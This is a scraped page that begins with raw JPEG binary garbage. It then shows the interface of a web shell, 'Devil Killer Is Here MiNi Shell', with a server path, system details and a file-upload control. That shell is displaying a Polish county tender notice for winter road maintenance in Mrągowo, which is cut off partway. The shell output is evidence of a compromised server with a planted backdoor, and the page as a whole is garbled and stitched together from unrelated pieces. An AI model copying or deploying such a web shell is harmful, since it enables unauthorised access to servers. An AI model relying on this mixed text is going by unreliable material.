JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241030/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20241030/0057236701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zimowe utrzymanie dróg powiatowych w sezonie zimowym 2024/2025 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIATOWY ZARZĄD DRÓG W MRĄGOWIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 510751088</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Nowogródzka 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mrągowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">11-700</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pzd.sekretariat@powiat.mragowo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pzd.powiat.mragowo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Działalność wspomagająca transport lądowy, zarządzanie drogami powiatowymi </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zimowe utrzymanie dróg powiatowych w sezonie zimowym 2024/2025 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c7bde26c-3488-4b0f-bb1e-0ee903f0a71d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00572367</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00038761/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Zimowe utrzymanie dróg powiatowych w sezonie zimowym 2024/2025</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/pzd_mragowo <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest w języku polskim w formie elektronicznej za<br/>pośrednictwem platformazakupowa.pl pod adresem https://platformazakupowa.pl/pn/pzd_mragowo</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o<br/>udzielenie zamówienia w tym składania ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między<br/>Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie, odbywa się przy użyciu środków komunikacji<br/>elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002r. o świadczeniu usług drogą elektroniczną ( t.j. Dz.U. z 2020 r. poz. 344).<br/>2. Wymagania techniczne i organizacyjne sporządzanie, wysyłanie i odbieranie korespondencji elektronicznej opisane są w; 1)<br/>regulaminie internetowej platformy zakupowej platformazakupowa.pl Open Nexus Sp. z o.o. dostępnym pod adresem:<br/>https://platformazakupowa.pl/strona/1-regulamin 2) https://platformazakupowa.pl/strona/45-instrukcje..</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający oświadcza, że spełnia wymogi określone w rozporządzeniu Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych<br/>osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie ochronie<br/>danych) (Dz. Urz. UE L z 2016 r. poz.119), dalej: RODO, tym samym dane osobowe podane przez wykonawcę będą przetwarzane<br/>zgodnie z RODO oraz zgodnie z przepisami krajowymi.<br/>1. Administratorem Pani/Pana danych osobowych jest: Powiatowy Zarząd Dróg w Mrągowie, ul. Nowogródzka 1, 11-700 Mrągowo,<br/>tel. 89 741-95-80, e-mail: pzd.sekretariat@powiat.mragowo.pl.<br/>2. Z Inspektorem ochrony danych osobowych można się skontaktować poprzez email:, e-mail: iod@powiat.mragowo.pl;<br/>3. Pani/ Pana dane osobowe przetwarzane są w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn.<br/>„Zimowe utrzymanie dróg powiatowych w sezonie 2024/2025” prowadzonym w trybie podstawowym art. 275 pkt 1;<br/>4. Pana/Pani dane osobowe przetwarzamy przede wszystkim na podstawie art. 6 ust.1 lit, c RODO, w świetle którego przetwarzanie<br/>jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze, co w analizowanym przypadku wynika z mocy<br/>ustawy Pzp<br/>i wytycznych;<br/>5. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym w przypadku zamówień objętych ustawą Pzp<br/>zostanie udostępniona dokumentacja postępowania<br/>w oparciu o art. 18 oraz art. 74 ustawy Pzp oraz tym, którym na podstawie odrębnych przepisów przysługuje prawo kontroli jak<br/>również zostaną udostępnione w oparciu o przepisy o dostępie do informacji publicznej.<br/>6. Pani/Pana dane osobowe będą przechowywane zgodnie z art. 78 ust. 1 przez 5 lat od dnia zakończenia postępowania o udziale<br/>zamówienia a jeżeli czas trwania umowy przekracza 5 lat okres przechowywania obejmuje cały czas trwania umowy.<br/>7. Osoba, której dane dotyczą ma prawo do:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych:- na podstawie art. 16 RODO prawo do sprostowania danych<br/>osobowych ;- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z<br/>zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>8. Skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku zamówienia publicznego ani zmianą postanowień<br/>umowy.<br/>9. Prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania w celu zapewnienia korzystania ze<br/>środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub z uwagi na ważne względy interesu publicznego Unii<br/>Europejskiej lub państwa członkowskiego.<br/>10. Nie przysługuje Pani/ Panu:<br/>a) w związku z art. 17, ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6, ust. 1 lit. c RODO.<br/>11. Posiada Pani/ Pan prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/>12. Podanie przez Pani/Pana danych osobowych jest dla zamówień:<br/>Ogłoszenie nr 2024/BZP 00268187 z dnia 2024-04-03<br/>2024-04-03 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>a) objętych prawem zamówień publicznych wymogiem ustawowym określonym w ustawie Pzp związanym z udzielonym<br/>zamówieniem publicznym. Konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>13. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art.<br/>22 RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DT.261.1.16.2024.MC</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest świadczenie usług zimowego utrzymania dróg powiatowych na terenie powiatu mrągowskiego w sezonie zimowym 2024/2025.<br/>1.	Zakres usług: Usługa zimowego utrzymania dróg powiatowych polegać będzie <br/>na utrzymaniu w przejezdności wyznaczonych dróg powiatowych poprzez odśnieżanie pługami, zmniejszenie śliskości poprzez posypywanie dróg materiałami uszorstniającymi tj.: mieszanką piasku z solą 20%. Zakres usług oraz szacunkowa ilość godzin pracy sprzętu zostały określone w formularzach cenowych przypisanych poszczególnym zadaniom. Służy to do wyliczenia szacunkowej wartości zamówienia przy składaniu ofert. <br/>Wiążące dla Zamawiającego będą ceny jednostkowe pracy sprzętu oraz czas pracy sprzętu.<br/>ZADANIE NR 1 - na terenie gminy Mikołajki<br/>Przedmiot zamówienia obejmować będzie drogi powiatowe zgodnie z wykazem zimowego utrzymania ujętym w poniższej tabeli.<br/>Lp.	Numer drogi	Nazwa drogi objętej zimowym utrzymaniem	lokalizacja	Ilość km<br/>1.	1696N	Mikołajki – Łuknajno - Tuchlin	1+964 – 4+850	2,886<br/>2.	1775N	Zełwągi ( dr.kraj.16) – dr. woj. nr 609	0+000 – 4+530	4,530<br/>3.	1777N	Mikołajki – Wejsuny – dr. kraj. nr 58	0+203 – 4+622	4,419<br/>4.	1779N	Tałty - Mikołajki	0+000 – 6+755	6,755<br/>5.	1781N	Górkło – Olszewo - Grabówka	0+000 – 5+818	5,818<br/>6.	1793N	Szymonka – Olszewo	0+000 -2+540	2,540<br/>7.	1926N	Kolonia Mikołajki - Woźnice	0+000 – 0+700<br/>5+000 – 5+870	0,700<br/>0,870<br/>8.	1751N	Zalec - Jora Wielka - Baranowo	4+776 - 15+055	15,055<br/> <br/>	<br/>Łącznie km drogi:	<br/>43,573 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest świadczenie usług zimowego utrzymania dróg powiatowych na terenie powiatu mrągowskiego w sezonie zimowym 2024/2025.<br/>1.	Zakres usług: Usługa zimowego utrzymania dróg powiatowych polegać będzie <br/>na utrzymaniu w przejezdności wyznaczonych dróg powiatowych poprzez odśnieżanie pługami, zmniejszenie śliskości poprzez posypywanie dróg materiałami uszorstniającymi tj.: mieszanką piasku z solą 20%. Zakres usług oraz szacunkowa ilość godzin pracy sprzętu zostały określone w formularzach cenowych przypisanych poszczególnym zadaniom. Służy to do wyliczenia szacunkowej wartości zamówienia przy składaniu ofert. <br/>Wiążące dla Zamawiającego będą ceny jednostkowe pracy sprzętu oraz czas pracy sprzętu.<br/>ZADANIE NR 2 - na terenie gminy Mrągowo, Sorkwity, Piecki. <br/>Przedmiot zamówienia obejmować będzie drogi powiatowe zgodnie z wykazem zimowego utrzymania ujętym w poniższej tabeli.<br/><br/>Lp.	Numer drogi	Nazwa drogi objętej zimowym utrzymaniem	lokalizacja	Ilość km<br/> 1	1509N	Młynowo – Mrągowo – Zyndaki – Choszczewo – <br/><br/>Borki Wlk. (odc. Młynowo-Zyndaki)	<br/>0+000 – 0+744<br/><br/>4+498-13+538<br/>	0,744<br/><br/>9,040<br/>2	1618N	Szestno - Nakomiady	0+000 –10+303	10,300<br/>3	1628N	dr.woj.nr590–Pilec <br/>(gr. powiatu-Burszewo)<br/>	0+599 -2+516	1,917<br/>4	1630N	dr.woj.nr590-Gązwa	4+156 -4+363	0,207<br/>5	1636N	Odc. Rozogi - Rybno	6+139 -9+868	3,729<br/>6	1699N	Św. Lipka – Szestno	6+422-14+885	8,463<br/>8	1755N	Burszewo – Warpuny - Sorkwity	0+000 -11+992	11,992<br/>9	1759N	Sorkwity - Rozogi	0+000 -7+072 7,072<br/>10	1634N	Sorkwity – Grabowo – Krzywe	0+000 -0+160 0,160<br/>11	1763N	Bagienice -Grabowo	0+000 -0+928 0,928<br/>12	Dawna droga nr .601/ DP bez numeru	Babięta – Nawiady	0+000 -5+689 5,689<br/>13	1638N	Babieta - Nawiady	0+000 -7+203	7,121<br/>14	1640N<br/>1640sN	dr. kraj. nr 59-Cierzpięty-Dobry Lasek <br/><br/>(odc. dr. kraj. nr 59 – Cierzpięty)	0+000 -2+558<br/><br/>0+000 -0+693	2,558<br/><br/>0,693<br/>15	1761N	BorowskiLas-dr.woj.nr600	0+000 -3+092	3,092<br/>16	1765N	dr.woj.nr600–Dłużec - Bobrówko	0+000 -22+169	22,089<br/>17	1769N	Piecki – Goleń – dr. nr 1638N	0+000 -6+950	6,950<br/>18	<br/>1773N	<br/>dr.woj.nr610–Krutyń - Rosocha	<br/>0+000 -7+032	<br/>7,007<br/>19	<br/>1454N	<br/>Czerwonka-dr.nr1755N	<br/>0+000 -5+344	<br/>5,344<br/>20	1509N	<br/>odc. Zyndaki-Borki Wlk.	<br/>13+538 -25+041	<br/>11,503<br/>21	1616N	<br/>dr. nr 1618N – Słabowo – Ryn	<br/>0+000 -3+525	<br/>3,525<br/>22	1620N	<br/>Rydwągi - Gronowo	<br/>0+000 -0+400	<br/>0,400<br/>23	1622N	<br/>Wyszembork – Słabowo	<br/>0+000 -4+740<br/>	<br/>4,740<br/>24	1628N	<br/>dr. woj. Nr 590 - Pilec	<br/>2+516 -3+334<br/>	<br/>0,818<br/>25	1630N	Szymanowo - Gązwa	0+000 -4+156<br/>4+363 -10+326	4,156<br/>5,963<br/>26	1632N	<br/>Młynik - Marcinkowo	<br/>4+520 -7+009	<br/>2,489<br/>27	1634N	<br/>Sorkwity – Grabowo -Krzywe	<br/>0+000 -10+492	<br/>10,492<br/>28<br/><br/>	1636N	dr.kraj.nr16-Rozogi–Dłużec<br/><br/>(odc. dr. K16 – Rozogi<br/><br/>(odc.Rybno-Dłużec)	0+000 -0+770<br/><br/>4+561-6+139<br/><br/>9+868- 22+674	0,770<br/><br/>1,578<br/><br/>12,806<br/> 29	1642N	<br/>dr. woj. Nr 610-Wojnowo-dr. kraj. nr 58	<br/>3+795 -4+331	<br/>0,536<br/>30	1644N	Nowy Most – Iznota	<br/>0+000 -1+620	<br/>1,620<br/>31	1681N	dr. kraj. nr 58 – Kolonia – dr. nr 1518N	<br/>0+000 -1+720	1,670<br/>33	1739N	Budziska – Sądry	<br/>1+000 -5+734	<br/>4,734<br/>34	1741N	dr. nr 1620N – Boże	<br/>0+000 -4+615	<br/>4,615<br/>35	1743N	Wyszembork – Zalec	<br/>0+000 -5+164	<br/>5,164<br/>36	1745N	odc. Popowo Salęckie - Młynowo	<br/>4+186 -8+002	<br/>3,735<br/>37	1747N	dr. kraj. nr 59 – Ostrów Pieckowski	<br/>0+545 -14+415	<br/>13,870<br/>38	1749N	dr. kraj. nr 59 – Kosowiec	<br/>0+000 -19+491	<br/>19,461<br/>39	1753N	Mierzejewo – Użranki	<br/><br/>0+000 -5+858	<br/>5,858<br/>40	1757N	Gązwa – Sorkwity	<br/>0+000 -9+917	<br/>9,917<br/>41	1763N	Bagienice – Grabowo	<br/>0+500 -0+500<br/><br/>2+643 -5+913	<br/>0,500<br/><br/>3,270<br/>42	1767N	Nikutowo – Krzywe – Brejdyny	<br/>0+000 -9+866	<br/>9,829<br/>43	1771N	odc. Prusinowo – dr. kraj. nr 58	<br/>0+000 -6+362	<br/>6,362<br/>44	1773N	odc. Rosocha – Karwica	<br/>7+032 -8+713	<br/>1,662<br/>50	1912N	dr. nr 1498N – Gant	1+948 -2+648	<br/>0,700<br/>51	1914N	Nikutowo – Wierzbowo	<br/>0+000 -2+348	<br/>2,332<br/>52	1916N	NotystWlk. – Notyst Mały	<br/>0+000 -2+876	<br/>2,876<br/>54	1968N	Św. Lipka – Gronowo – dr.nr 1618N	<br/>10+768 -15+002	<br/>4,234<br/> <br/>Łącznie km drogi:	<br/>277,280 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wykonawca dysponuje lub będzie dysponował w pełni sprawnymi jednostkami sprzetowo-transportowymi wymienionymi w formularzach cenowych na poszczególne zadania. Zadanie nr 1 na terenie gminy Mikołajki w pełni sprawnym sprzętem tj. ciągnik o mocy min. 80LM z pługiem min. 1 szt, ciagnik o mocy min. 80KM z pługiem + piaskarka min.1 szt., koparko-ładowarka min.1 szt. Zadanie nr 2 na terenie gminy Mrągowo, Sorkwity, Piecki ciągnik o mocy min. 100 km z pługiem + piaskarka min. 3 szt., koparko-ładowarka min. 1 szt. <h3 class="mb-0">5.5.) Zamawiający wymaga 